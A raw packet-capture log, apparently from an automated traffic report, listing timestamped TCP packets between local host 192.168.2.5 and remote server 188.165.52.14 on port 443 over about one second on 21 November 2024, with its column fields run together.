                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.399629116 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.405237913 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.405252934 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.405318022 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.405325890 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.405364990 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410795927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410804987 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410892010 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410898924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410934925 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.410953999 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415668964 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415684938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415743113 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415750027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415776968 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.415802956 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.421772003 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.421788931 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.421885014 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.421891928 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.421936989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.426995993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.427011013 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.427082062 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.427089930 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.427099943 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.427139044 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.531088114 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.531120062 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.531208038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.531235933 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.531302929 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.586627960 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.586647987 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.586715937 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.586730957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.586775064 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592065096 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592078924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592134953 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592140913 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592168093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.592181921 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.597970009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.597985983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.598030090 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.598037004 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.598067045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.598083973 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.602811098 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.602826118 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.602883101 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.602890968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.602935076 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.608483076 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.608499050 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.608556986 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.608566046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.608618021 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.613753080 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.613769054 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.613822937 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.613830090 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.613868952 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.618664980 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.618680000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.618746042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.618752956 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.618791103 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.724934101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.724960089 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.725159883 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.725176096 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.725225925 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.779246092 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.779268980 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.779366016 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.779373884 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.779411077 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.784197092 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.784214020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.784282923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.784287930 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.784331083 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.789088011 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.789103985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.789160013 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.789170027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.789211035 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.795943022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.795958042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.796020031 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.796025991 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.796061039 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.801517010 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.801542044 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.801620960 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.801635981 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.801676989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.806896925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.806914091 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.806981087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.806986094 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.807084084 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.913461924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.913492918 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.913724899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.913739920 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.913791895 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.918920040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.918946028 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.919013023 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.919024944 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.919063091 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.970436096 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.970460892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.970542908 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.970551014 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.970592976 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.976128101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.976146936 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.976212025 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.976217985 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.976255894 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.981151104 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.981169939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.981230021 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.981235981 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.981271029 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.986660004 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.986677885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.986732960 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.986738920 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.986774921 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.992369890 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.992388010 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.992449045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.992455959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.992492914 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.997663021 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.997680902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.997739077 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.997744083 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:19.997778893 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.104490042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.104518890 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.104603052 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.104617119 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.104657888 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.109118938 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.109138012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.109210014 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.109215975 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.109287977 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163340092 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163367033 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163414001 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163429022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163439989 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.163461924 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168368101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168385983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168431044 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168437004 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168457031 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.168476105 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.174057007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.174118042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.175230026 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.175302029 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.179008007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.179030895 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.179111004 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.179125071 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.179168940 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.184678078 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.184695959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.184751987 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.184758902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.184793949 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.190032959 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.190049887 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.190116882 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.190124989 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.190160990 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.296471119 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.296497107 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.296638012 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.296652079 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.296698093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.300872087 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.300887108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.300961018 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.300971031 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.301007032 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355168104 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355210066 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355278969 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355299950 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355320930 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.355339050 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.360970020 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.361016035 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.361084938 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.361093044 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.361140966 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365833998 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365875006 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365912914 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365920067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365932941 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.365952969 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371557951 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371608973 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371639967 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371645927 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371665955 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.371686935 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.377021074 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.377043009 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.377115965 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.377123117 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.377161980 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.383136034 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.383157015 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.383213997 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.383219957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.383255959 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.488332033 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.488353968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.488497019 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.488512039 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.488558054 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.493350029 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.493366957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.493436098 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.493443012 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.493489981 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548274040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548363924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548468113 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548485994 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548496962 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.548527002 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553195000 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553253889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553303957 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553312063 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553344965 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.553369045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558284998 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558342934 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558383942 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558389902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558425903 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:20.558439016 CET49824443192.168.2.5188.165.52.14
